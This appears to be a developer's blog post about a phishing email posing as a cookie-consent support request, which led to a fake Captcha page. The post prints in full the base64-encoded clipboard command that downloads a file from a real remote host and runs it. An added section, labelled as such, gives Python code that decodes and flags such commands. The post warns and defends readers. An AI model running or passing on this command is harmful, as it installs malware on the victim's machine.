The scariest “user support” email I’ve ever received

Hi, it's Takuya. As your app grows in popularity, you occasionally start to attract attacks aimed directly at you—the developer or site owner. Just the other day, I got one that was honestly terrifying, so I'd like to share it.

The Email

Subject: Cookie consent prevents platform access

Hello,
I cannot access use the store.
The cookie consent notice keeps appearing and nothing happens once I approve or try to close it, so I’m unable to interact with the website.
Please provide guidance on how to resolve this or provide an alternative solution so I can access?

In short, they’re saying:

“I can’t use your site because the cookie consent keeps blocking access.”

Weird already — because my app’s website, https://www.inkdrop.app/, doesn’t even show a cookie consent dialog. I don’t track or serve ads, so there’s no need for that.

Still, I replied politely:

Can you tell me which Url, your OS, and browser?
Kind regards,
Takuya

A bit later, I got this reply (which Gmail had automatically placed in the spam folder):

Hey,
Thanks for your previous guidance.
I'm still having trouble with access using the latest version of Firefox on Windows
It's difficult to describe the problem so I've included a screenshot.
https://sites.google.com/view/drive-845fro3buhxi/screen?fileid=15034204
Please take a look and suggest the next steps.

At first glance, it looked perfectly normal. But notice — they never actually told me which page was causing the issue. Instead, they sent a link claiming to contain a screenshot. It looked like a Google Drive link, but it was actually a Google Sites page. Without thinking, I clicked it. (You should never do this!)

The Trap

It showed a Captcha screen.
I clicked it… and got this:

It said something like “verification step” — telling me to open a terminal, paste a command, and run it. That’s when it hit me: “Oh no, this is phishing.”

The command they had copied to my clipboard was this:

echo -n Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS | base64 -d | bash

Never run anything like this in your terminal. It downloads and executes a shell script from a remote server, as ChatGPT confirmed when I asked it to analyze it.

Absolutely terrifying.

Because Gmail had flagged the second message as spam, the URL was probably already reported as malicious. But the first message wasn’t flagged — so I thought, “Maybe it’s a false positive,” and replied. Big mistake.
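A command like the one above can be inspected without ever running it. The following is an added example, not part of the original post: it decodes the base64 blob statically and lists what the hidden command would do. The function names, the indicator list and the sample command (with a placeholder host) are assumptions made for illustration.

```python
import base64
import re

# echo [-n] <blob> | base64 -d | <shell>: the shape of the command on this page
PIPE_TO_SHELL = re.compile(
    r"echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\|\s*base64\s+"
    r"(?:-d|-D|--decode)\s*\|\s*(?:ba|z|da)?sh\b"
)
INDICATORS = {
    "downloads a remote file": re.compile(r"\b(?:curl|wget)\b"),
    "marks a file executable": re.compile(r"\bchmod\s+\+x\b"),
    "runs a file from a temp directory": re.compile(r"(?:^|[;&|]\s*)/(?:tmp|var/tmp)/\S+"),
}
URL = re.compile(r"https?://[^\s;'\"]+")


def inspect_pasted_command(command):
    """Decode an 'echo <b64> | base64 -d | sh' one-liner statically; never runs it."""
    match = PIPE_TO_SHELL.search(command)
    if match is None:
        return None  # not the decode-and-pipe-to-shell pattern
    try:
        decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return {"decoded": None, "findings": ["blob is not valid base64"], "urls": []}
    findings = [label for label, rx in INDICATORS.items() if rx.search(decoded)]
    return {"decoded": decoded, "findings": findings, "urls": URL.findall(decoded)}


def defang(url):
    """Make a URL non-clickable before pasting it into a report or chat."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


# Constructed sample with the same shape as the command above. The host is a
# placeholder (assumption), and nothing here is fetched or executed.
SAMPLE_INNER = "curl -sL -o /tmp/x https://example.invalid/payload; chmod +x /tmp/x; /tmp/x"
SAMPLE = "echo -n " + base64.b64encode(SAMPLE_INNER.encode()).decode() + " | base64 -d | bash"

if __name__ == "__main__":
    report = inspect_pasted_command(SAMPLE)
    print("decoded :", report["decoded"])
    for finding in report["findings"]:
        print("finding :", finding)
    print("urls    :", [defang(u) for u in report["urls"]])
```

All three findings appearing together (download, chmod +x, execute from /tmp) is the download-and-execute pattern described above.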

AI-powered spam and phishing are on the rise

Even on my user forum, I’ve started seeing suspicious posts that seem to be written by AI. They look natural at first glance, but the intent is unclear — often just spam or trolling.

Phishing emails disguised as support inquiries are getting more sophisticated, too.
They read naturally, but something always feels just a little off — the logic doesn’t quite line up, or the tone feels odd.

It’s unsettling. Stay alert, guys — the attacks are getting smarter. Hope it's helpful!